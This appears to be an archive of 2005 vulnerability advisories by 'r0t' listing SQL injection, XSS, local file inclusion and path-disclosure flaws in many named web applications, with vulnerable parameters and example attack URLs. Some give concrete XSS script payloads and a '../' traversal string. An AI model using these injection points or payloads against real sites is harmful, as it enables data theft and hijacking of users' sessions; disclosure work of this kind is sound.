Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.upyournet.com/edmobbs/index.php
affected version: V0.9 and prior

Product Description:
edmoBBS is not a cluttered and complex board system with membership requirements. It is instead, simple and modern. The goal of edmoBBS is to meet the needs of webmasters looking for an easy to manage and easy to use general purpose board which uses PHP and MySQL for efficiency and speed. Multiple boards can be created and managed with the poweful admin features. edmoBBS is available in two versions: A fully functional FREE version, and a more refined commercial version for $50.00.

Vuln. description:
Input passed to the "table" and "messageID" parameter isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/edmobbs9r.php?messageID=1&table=[SQL]
/edmobbs9r.php?messageID=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

JBB SQL inj. vuln.

JBB SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.joelh.de/jbb/
affected version: jbb 0.9.9rc3 and prior

Vuln. description:
Input passed to the "nr" parameter in "topiczeigen.php", "forum" "zeigeseite" in "showforum.php", "forum" in "newtopic.php", "tidnr" in "neuerbeitrag.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/topiczeigen.php?nr=[SQL]
/showforum.php?forum=[SQL]
/showforum.php?forum=1&zeigeseite=[SQL]
/newtopic.php?forum=[SQL]
/neuerbeitrag.php?tidnr=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Ugroup 2.6.2 SQL inj. vuln.

Ugroup 2.6.2 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.realsoftstudio.com/Ugroup/
affected version:2.6.2 and prior


Product Description:

A Software discussion platform written in PHP & Mysql
Ugroup is a Discussion Board application developed in PHP and uses MySQL as a database server.With Ugroup, users will be able to post question, comments and ideas on to different discussion groups on your web site.An Administrator will be able to create the custom discussion group and assign users. Among some of the new features in this edition:Includes the ability to approve or disqualify a message.Create your own private discussion area, where only the selected users will be able to post/view the messages.Read only discussion, where you and the selected users will be able to post articles and messages, but all would be able to only read


Vuln. description:

Input passed to the "FORUM_ID" parameter in "forum.php" and " CAT_ID", "FORUM_ID","TOPIC_ID" in "topic.php" , isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/forum.php?FORUM_ID=[SQL]
/topic.php?CAT_ID=1&FORUM_ID=1&TOPIC_ID=[SQL]
/topic.php?CAT_ID=1&FORUM_ID=[SQL]
/topic.php?CAT_ID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

ShockBoard SQL inj. vuln.

ShockBoard SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.sourceshock.com/
affected version:v3.0 and v4.0 [develop. version]

Product Description:
An easy to setup and use message board written PHP with MySql on the backend. Features: Avatars; Smilies; Advanced profiles; moderators, supermoderators and administrators; Database cleanup function; Standard thingies like quotes, delete messages; Private forums; and more

Vuln. description:
Input passed to the "offset" parameter in "topic.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/topic.php?offset=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Netzbrett 1.5.1 SQL inj. vuln.

Netzbrett 1.5.1 SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.weaverslave.ws/index.32.html
affected version: 1.5.1 and prior

Product Description:

Netzbrett is a Web board / forum system written in PHP3/4 that can use flat text files, mysql or the PHP 4 db object (Interbase, MSQL, MSSQL, mySQL, Oracle 8, ODBC, PostgresSQL, Storage, Sybase) for data handling. The forum includes a simple Admin mode, which enables modifying and deletion of entries by the admin. It also includes a print view. The program is avaliable in English, German, Italian, Chinese (Taiwan) and many other languages. You can show the dates as C.A., B.E or Thai.

Vuln. description:

Input passed to the "p_entry" parameter in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?p_lng=en&p_days=15&p_cmd=entry&p_entry=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SimpleBBS v1.1 SQL inj. vuln.

SimpleBBS v1.1 SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.simplemedia.org/
affected version: v1.1 and prior

Product Description:

SimpleBBS is a free flat-file based bulletin board. It is very easy to install and use, and there are no useless features so even first timers can learn to use fast

Vuln. description:

input in search module parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code .


Solution:
Edit the source code to ensure that input is properly sanitised.

Sunday, November 27, 2005

ADC2000 NG Pro SQL inj. vuln.

ADC2000 NG Pro SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 27 nov. 2005
vendor:http://www.td-systems.com/products/
affected version: 1.2 and ADC2000 NG Pro Lite

Product Description:
AD Center 2000 NG Pro is a professional version of banner exchange software for organizing your own Banner Exchange. Software uses MySQL backend, and has rich media ads support, multibanner support, advanced targeting, multilanguage support, flash stats and much more. C-engine with internal cache system allow you to have huge loadings and show up to 6 millions banners per day.

Vuln. description:
Input passed to the "lang" and "cat" parameter in "adcbrowres.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/adcbrowres.php?lang=english&cat=[SQL]
/adcbrowres.php?lang=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

PHP Doc System 1.5.1 Local file inclusion vuln.

PHP Doc System 1.5.1 Local file inclusion vuln.
Vuln. dicovered by : r0t
Date: 27 nov. 2005
Vendor:http://www.alexking.org/
affected version: 1.5.1 and prior

Product Description:
A modular PHP system for creating documentation. You create modules for documentation elements (installation steps, buttons, screens, etc.) and then refer to them instead of having to copy/paste information you'd want to have in 2 or more places. For example, you have an application that has buttons on a toolbar which appears on several screens. You define each button, define the toolbar and include the buttons, then define the screens and include the toolbar which in turn includes the buttons. It can run as dynamic PHP, including everything on the fly or it can output static HTML that you can include in your software distribution. Version 1.5 adds a 'related links' sidebar and a module generator. Offered as Donationware.

Vuln. description:
Input passed to the "show" parameter in "index.php" isn't properly verified, before it is used to include files . This can be exploited to include arbitrary files from local resources or to view files from local resource.

example:
/index.php?show=../File

Solution:
Edit the source code to ensure that input is properly sanitised.

SDMS 2.0 SQL inj. vuln.

Simple Document Management System SQL injection Vuln.

Vuln. dicovered by : r0t
Date: 27 nov. 2005
Vendor:http://sdms.cafuego.net/
affected version: 2.0-CVS and prior

Product Description:
SDMS uses PHP to provide you with a pretty interface to a MySQL server that allows you to store and retrieve documents and to share those doucments between users. In addition, the system uses ACL (Access Control Lists) to grant access rights to documents on a per-user basis. It allows you to distribute project documentation on a need-to-know basis, whilst keeping a central repository of documents that is accessible to all team members and easy to manage.



Vun. description:
Input passed to the "folder_id" parameter in "list.php" and "mid" parameter in "messages.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/list.php?folder_id=[SQL]
/messages.php?forum=1&action=view&mid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Saturday, November 26, 2005

VBulletin 3.5.1 XSS vuln.


VBulletin 3.5.1 XSS vuln.

Vuln. dicovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.vbulletin.com/
affected version:3.5.1 and prior

Vuln. Description:

vBulletin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the remote avatar URL upon submission to the profile.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Manual Testing Notes:
Specify the following in the remote avatar url field, in the editavatar page:
http://www.parsing:error[XSS].com/.jpg


Solution:
Edit the source code to ensure that input is properly sanitised.

Disclosure timeline:

15 nov. contacted vendor.
Till today there is no fixes from vendor.

Zorum Forum 3.5 "rollid" SQL inj. vuln.

Zorum Forum 3.5 "rollid" SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 26 nov. 2005
Vendor:http://zorum.phpoutsourcing.com/index.php
affected version: 3.5 and prior


Vuln. Description:

Input passed to the "rollid" parameter is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Example:
/index.php?method=showhtmllist&list=topic&rollid=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Amazon Shop 5.0.0 XSS vuln.

Amazon Shop 5.0.0 XSS vuln.

Vuln. dicovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.ghostscripter.com/amazon_shop.php
affected version:5.0.0 and prior

Product description:

With Amazon Shop you can run your very own fully functional shop without dealing with stock, payments etc... just setup an Amazon Associate account, install the 'Amazon Shop' script using the easy installation file and your ready to go! You can easily edit which categories and items are displayed on your site. You can offer any of the items that Amazon does and earn upto 15% in referal fees. Built-in shopping cart allows customers to add their product to the cart and leave your website only when ready to checkout at Amazon.com All pages are easily modified via the built in WYSIWYG editor (i.e. 6+) Have mutiple templates installed, insantly changeable through the admin panel. Optional Dynamic Title, Sort Box, Meta Keywords and Path bar Custom Categories & Products Automatic DB fill for Hot Deals & Featured Items. Supports US,UK,DE,JP,FR and CA All languages in language files for easy change Powerful Admin Panel Optional mod_rewrite for search engine friendly urls

Vuln. Description:

Input passed to the "query" parameter in "search.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/search.php?query=%3Cscript%3Ealert%28%27r0t%27%29%3
C%2Fscript%3E&mode=all&imageField.x=21&imageField.y=4


Solution:
Edit the source code to ensure that input is properly sanitised.

Post Affiliate Pro 2.0.x Vuln.

Post Affiliate Pro 2.0.x Vuln.
Vuln. dicovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.qualityunit.com/postaffiliatepro/
affected version:2.0.4 and prior



Product description:

Very powerful affiliate software. Free installation with every purchase. Easily set up and maintain your own affiliate program. Support for all types of commissions up to 10-tiers including recurring. Customizable email notifications, mass emails to affiliates. Flexible payout functions, set minimum balance, full payout history. Approve affiliates and sales. Automatic fraud protection. Performance rewards, signup bonus. Multi-language support. Extensive reports and statistics. and much more..




Vuln. Description:

1.
Input passed to the "sortorder" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


2.
Input passed to the "md" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.
Successful exploitation requires that "magic_quotes_gpc" is disabled.



examples:

/merchants/index.php?md=[FILE]

/postaffiliatepro/merchants/index.php?tm_userid=_&tm_
orderid=&tm_transtype%5B%5D=32&tm_transtype%5B%5D=1&
tm_transtype%5B%5D=2&tm_transtype%5B%5D=4&tm_transtyp
e%5B%5D=8&tm_transtype%5B%5D=16&tm_transtype%5B%5D=64
&tm_status=_&tm_day1=25&tm_month1=11&tm_year1=2005&tm
_day2=25&tm_month2=11&tm_year2=2005&numrows=20&filter
ed=1&md=[File]

/merchants/index.php?um_name=&um_surname=&um_aid=&um_
status=_&numrows=20&filtered=1&md=[File]

/merchants/index.php?tm_userid=_&tm_orderid=&tm_transt
ype%5B%5D=32&tm_transtype%5B%5D=1&tm_transtype%5B%5D=2
&tm_transtype%5B%5D=4&tm_transtype%5B%5D=8&tm_transtyp
e%5B%5D=16&tm_transtype%5B%5D=64&tm_status=_&tm_day1=2
5&tm_month1=11&tm_year1=2005&tm_day2=25&tm_month2=11&t
m_year2=2005&numrows=20&filtered=1&md=Affiliate_Mercha
nts_Views_TransactionManager&type=all&list_page=0&acti
on=&sortby=ip&sortorder=[SQL]

/merchants/index.php?um_name=&um_surname=&um_aid=&um_s
tatus=_&numrows=20&filtered=1&md=Affiliate_Merchants_V
iews_AffiliateManager&list_page=0&sortby=a.surname&act
ion=&sortorder=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

BosDates v4.0 SQL vuln

BosDates v4.0 SQL vuln
Vuln. dicovered by : r0t
Date: 26 nov. 2005
Vendor:http://www.bosdev.com/bosdates/
affected version: BosDates v4.0 and prior


Product description:

The BosDates event calendar is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least techincal users.
The BosDates event calendar system allows your visitors to interact with your site on a whole new level. And we all know that interactive websites keep their visitors coming back on a regular basis.
With BosDates you can Create unlimited calendars easily, Assign calendars to non technical users, Inform target audiences of events that interest them and Publish your events world wide
The BosDates calendar system is the best full featured calendar system on the market today at half the price of our competitors!

Vuln. Description:

Input passed to the "year" and "category" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
/calendar.php?type=day&calendar=&category=&day=25&month=11&year=[SQL]
/calendar.php?type=day&calendar=&category=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Entergal MX V2.0 SQL vuln.

Entergal MX V2.0 SQL vuln.
Vuln. dicovered by : r0t
Date: 26 nov. 2005
Vendor:www.entergal.com
affected version: v2.0 and prior

Product description:
Entergal Directory MX for PHP is the ultimate solution for making money from your own directory engine. This package gives you total flexibility over the type of directory you want to run - from a Google type directory to business yellow pages to computer games topsites. Our system uses regular resets along with the World's only rolling fortnight system which guarantees the most reliable results possible! There are also many built in cheat protection features and a fully featured admin panel.

Vuln. Description:
Input passed to the "action" and "idcat" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
/?action=showcat&idcat=[SQL]
/?action=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Friday, November 25, 2005

CS-Cart SQL inj. vuln.

CS-Cart SQL inj. vuln.

Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.cs-cart.com
affected version: Latest.


Product description:
CS-Cart is a turnkey solution that includes all of the necessary features and functions to successfully build an online product store/catalog. It is ready to use "out of the box". With its easy to use functionality you can immediately start to build and operate an ecommerce website of any complexity: from a simple offline product catalog to fully-featured interactive online store. Optimized programming code makes it possible to build catalogs that can easily handle over 10,000 product and informational pages. And integrated HTML catalog tool allows generating a search-engine friendly version of your website.


Vuln. Description:

Input passed to the "sort_by" and "sort_order" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?target=products&mode=search&subcats=
Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname
=Y&cid=0&q=&x=11&y=3&sort_by=[SQL]

/index.php?target=products&mode=search&subcats=
Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid
=0&q=%27&x=11&y=3&sort_by=product&sort_order=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

DRZES HMS 3.2 Multiple vuln.

DRZES HMS 3.2 - Hosting Management System -multiple SQL inj. vuln. and XSS vuln.

Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://drzes.com/
affected version:3.2 and prior


Product description:

Increase your efficiency using the DRZES HMS. The DRZES HMS is packed with features perfect for the professional web hosting company. The HMS is an all-in-one solution featuring a robust control panel, the ability to manage all of your servers from one centralized location, allows your customers to manage all of their plans from one centralized location, fully customizable front-end, and customer control area including the control panel and much more. We do not brand our name on your site. More features include multiple billing gateways supported, multiple registrar API's supported, server monitoring, robust plan maintenance functions, bandwidth monitoring and more. If there's a specific feature you need before you purchase the drzes HMS or an additional API supported please let us know and we will promptly take care of your request.

Vuln. Description:

1. Multiple SQL injections vuln.
Input passed to the "plan_id" and "domain" parameter in "pop_accounts.php" ,"databases.php","ftp_users.php","crons.php","pass_dirs.php","zone_files.php",
"htaccess.php","software.php","domains.php","viewusage.php"
isn't properly sanitised before being used in a SQL query.
And input passed to the "invoiceID" parameter in "viewinvoice.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
And input passed to the "customerPlanID" parameter in "viewplan.php" and "listcharges.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
And input passed to the "ref_id" parameter in "referred_plans.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/customers/domains.php?plan_id=[SQL]
/customers/viewinvoice.php?invoiceID=[SQL]
/customers/viewplan.php?customerPlanID=[SQL]
/customers/referred_plans.php?ref_id=[SQL]
/customers/referred_plans.php?sort=id&order=asc&ref_id=[SQL]
/customers/viewusage.php?plan_id=[SQL]
/customers/listcharges.php?customerPlanID=[SQL]
/customers/pop_accounts.php?plan_id=[SQL]
/customers/pop_accounts.php?plan_id=35&domain=[SQL]
/customers/databases.php?plan_id=[SQL]
/customers/databases.php?plan_id=35&domain=[SQL]
/customers/ftp_users.php?plan_id=[SQL]
/customers/ftp_users.php?plan_id=35&domain=[SQL]
/customers/crons.php?plan_id=[SQL]
/customers/crons.php?plan_id=35&domain=[SQL]
/customers/pass_dirs.php?plan_id=[SQL]
/customers/pass_dirs.php?plan_id=35&domain=[SQL]
/customers/zone_files.php?plan_id=[SQL]
/customers/zone_files.php?plan_id=35&domain=[SQL]
/customers/htaccess.php?plan_id=[SQL]
/customers/htaccess.php?plan_id=35&domain=[SQL]
/customers/software.php?plan_id=[SQL]
/customers/software.php?plan_id=35&domain=[SQL]


2. XSS vuln on Search domain aviabilty field.
into:
/customers/register_domain.php
Search domain aviability parameters when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Clientexec 2.x Multiple SQL inj.

Clientexec 2.x Multiple SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.clientexec.com/
affected version: Tested on 2.3 ,but also newest versions also can have this vuln.

Product description:
ClientExec is a tool to help web hosts manage and support their clients efficiently. Unlike many client management packages, ClientExec does not try to be all things to all people; you are in control. We want it to be a natural addition to your business, a powerful tool you use, not get lost within. Top features include power customer management, recurring invoicing, integrated helpdesk and tons of 3rd party payment processor support. Autowithdrawal for authorize.net and cdgcommerce are accounts now integrated into CE

Vuln. Description:
Input passed to the "billshowid" "billdetailid" "fuse" "frmClientID" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
clientexec/index.php?action=0&billdetailid=26&billshowid=[SQL]
clientexec/index.php?action=0&billdetailid=[SQL]
clientexec/index.php?fuse=[SQL]
clientexec/index.php?billshowid=[SQL]
clientexec/index.php?fuse=3&frmClientID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

EZ Invoice Inc™ v 2.0 SQL inj.

EZ Invoice Inc™ v 2.0 SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.ezinvoiceinc.com/
affected version:v 2.0 and prior



Product description:
This software is the easiest way create and manage invoices online with just the click of the mouse from anywhere in the world. All you need is a website with internet connection. EZI was created for the small business person: mom and pop shops, sole proprietors, small graphic studios, online start ups, solopreneurs, virtual assistants and more. EZI features a client lounge where your clients can login to view, print and even pay their invoices online by Credit Card (PayPal integration). Created by a Graphic Designer the software looks simple therefore is easy to use and learn!

Vuln. Description:
Input passed to the "i" parameter in "invoices.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/ezi/invoices.php?i=[SQL]

Solution:

EZ Invoice, Inc™ has a patch available. Please email support@ezinvoiceinc.com and EZI
will email you the patch to fix this small issue.

LogicBill 1.0 SQL inj.

LogicBill 1.0 SQL inj.

Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.logicbill.com
affected version: 1.0 and prior

Product description:
LogicBill is a fully featured web based billing application. It offers integrations with several payment processors, automated invoice generation, reporting, client administration features and a clean but powerful interface for your staff and customers.

Vuln. Description:
Input passed to the "__mode" "__id" parameter in "helpdesk.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/helpdesk.php?__mode=[SQL]
/helpdesk.php?__mode=view&__id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Fantastic News "category" SQL inj.

Fantastic News "category" SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.fscripts.com
Product link:http://fscripts.com/free.php?id=1
affected version: 2.1.1 and prior


Product description:

Fantastic News is a very simple but powerful news management system. It contains an easy install script it gives you the ability to modify everything that the script displays since it uses templates. It has multiple user levels for news posters, ability to comment news, rating of news items, read more news option, WYSIWYG editor for news, uploading of files to news items, smilies and comment code for comments. It has the ability to generate XML feeds for a specified amount of news items. It has archive and search news support as well as a built in news tip system. It contains all these features but it is also very fast and uses minimal resources.


Vuln. Description:

Input passed to the "category" parameter in "news.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/news.php?action=news&category=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

DMANews Multiple SQL inj. vuln.

DMANews Multiple SQL inj. vuln.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.dmanews.com/
affected version: 0.904 (latest downloadable version) and v0.910 [Development version]

Product description:

Popular, powerful, secure. DMANews focuses on ease of use and flexible customisation. With excellent documnetation and a choice of 4 beautiful control panels, it installs in 5 minutes flat with easy interactive walkthrough script. Save yourself some time and check out the (always working!) online demo for an immediate appraisal. Requires PHP4 & MySQL.

Vuln. Description:

Input passed to the multiple parameters isn't properly sanitised before being used in a SQL query( examples provided,see below). This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/index.php?action=comments&id=[SQL]
/index.php?action=news_list&navigation=1&sortorder=unixtime&
sortdirection=DESC&start_item=4&display_num=[SQL]
/index.php?action=news_list&navigation=1&sortorder=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

phpWordPress 3.0 SQL inj.

phpWordPress Article Manager 3.0 SQL inj.

Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.word-press.net/
affected version: 3.0 and prior.

Vuln. Description:
Input passed to the "poll" "category" and "archive" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?poll=[SQL]
/index.php?category=[SQL]
/?archive&ctg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

sNews 1.3 SQL injection.

sNews 1.3 SQL injection.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.solucija.com/
affected version:1.3 and prior

Vuln. Description:
Input passed to the "id" and "category" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

Kayako SupportSuite v3.00.x Full path Disclosure

Kayako SupportSuite v3.00.x Full path Disclosure .

Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:kayako.com
affected vesion:v3.00.12 and prior

Vuln. Description:

Due invalid input parameters or not enough parameters, which may be exploited by attackers to determine the installation path.
See in examples:

/index.php?_m=troubleshooter&_a=
/index.php?_m=troubleshooter&_a=steps&troubleshootercatid=
/index.php?_m=downloads&_a=viewdownload&downloaditemid=
/index.php?_m=downloads&_a=
/index.php?_m=knowledgebase&_a=
/index.php?_m=tickets&_a=
/index.php?_m=news&_a=
/index.php?_m=news&_a=viewnews&newsid=

Solution:
Edit the source code to ensure that input is properly sanitised.

OWOS Lite 3.0 SQL inj.

Online Work Order Suite: Lite Edition for ASP 3.0 SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.onlinetechtools.com
Product link:http://www.onlinetechtools.com/products/owoslite/
affected vesion:3.0 and prior


Vuln. Description:
Input passed to the "keyword" parameter in "search.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

OASYS Lite 1.0 "search.asp" XSS vuln.

OASYS Lite 1.0 "search.asp" XSS vuln.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.onlinetechtools.com
Product link:http://www.onlinetechtools.com/products/oasyslite/
affected vesion: 1.0 and prior

Vuln. Description:
Search parameters in "search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

OKBSYS Lite 1.0 "search.asp" XSS vuln.

Online Knowledge Base System: Lite Edition 1.0 XSS vuln.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.onlinetechtools.com
Product link:http://www.onlinetechtools.com/products/okbsys/
affected vesion: 1.0 and prior


Vuln. Description:
Input passed to the "q" parameter in "search.asp" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


example:
/search.asp?q=
%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&c=&a.x=21&a.y=11

Solution:
Edit the source code to ensure that input is properly sanitised.

Helpdesk Issue Manager v0.9 SQL inj.

Helpdesk Issue Manager v0.9 SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://helpdesk.centralmanclc.com/
affected vesion:v0.9 and prior

Vuln. Description:
Input passed to the "id" parameter in "issue.php" isn't properly sanitised before being used in a SQL query.
And parameters in "find.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/issue.php?id=[SQL]
/find.php?act=action&reset=yes&detail%5B%5D=[SQL]
/find.php?page=0&act=action&orderby=sortorder&orderdir=[SQL]
/find.php?page=0&act=action&orderby=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SMBCMS v2.1 SQL injection.

SMBCMS v2.1 SQL injection.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.smbcms.com
affected vesion: v2.1

Vuln. Description:
SMBCMS search engine contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search feature not properly sanitizing user-supplied input.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

DapperDesk 3.0.x "page" SQL inj.

DapperDesk "page" SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.dapperdesk.com/
affected vesion: 3.0.1 and prior


Vuln. Description:
Input passed to the "page" parameter in "news.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/news.php?page=[SQL]

Solution:

Edit the source code to ensure that input is properly sanitised.

Systems Panel v1.0.x Multiple SQL inj.

Systems Panel v1.0.x Multiple SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.sysbotz.com
Product link:http://www.sysbotz.com/products/systemspanel/index.htm
affected vesion: 1.0.6 and prior


Vuln. Description:
Input passed to the "cid" parameter in "knowledgebase/index.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "aid" parameter in "knowledgebase/view.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "cid" parameter in "contact/update.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "letter" parameter in "links/index.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "mid" parameter in "messageboard/view.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "tid" parameter in "tickets/view.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/systemspanel/knowledgebase/index.php?cid=[SQL]
/systemspanel/knowledgebase/view.php?aid=[SQL]
/systemspanel/contact/update.php?cid=[SQL]
/systemspanel/links/index.php?letter=A[SQL]
/systemspanel/messageboard/view.php?mid=[SQL]
/systemspanel/tickets/view.php?tid=[SQL]

Solution:

Edit the source code to ensure that input is properly sanitised.

pdjk-support suite sql inj.

pdjk-support suite sql inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://support.pdjkeelan.com/
affected vesion: 1.1a retail edition and prior.

Product Description:
The pdjk-support suite is a full suite of online technical support segments. These segments include: New's - The ability to add news to the front page of your support suite and allow users to comment on the news articles. FAQ's - Sorted into Categories, Sub-categories, most viewed, newest entries etc. Users can also submit FAQ's for administration approval and FAQ's can also be commented on similar to the news commenting system. Admin's can also include HTML in their FAQ's. Support - This allows users to submit support tickets so that a administrator can respond with the help they need, the support ticket can be opened/closed by both the admin and the user. Admin's can also include HTML in their entries. Custom fields in the support tickets. E-mail notification about support tickets for admin's for individual departments or all departments. Administration Panel – A very easy to use but in-depth admin panel featuring administration for all of the features in the support suite. Other sections include: - Search - Dynamic ranks - Dynamic Departments - Template Creator - Indepth logging system - Easy-to-use installer

Vuln. Description:
Input passed to the "rowstart" "news_id" "faq_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?page=home&order=&orderby=&rowstart=[SQL]
/index.php?page=news&subsection=viewcomments&news_id=[SQL]
/index.php?page=faq&subsection=viewfaq&faq_id=[SQL]


Solution:

Edit the source code to ensure that input is properly sanitised.

Pedejas dienas..

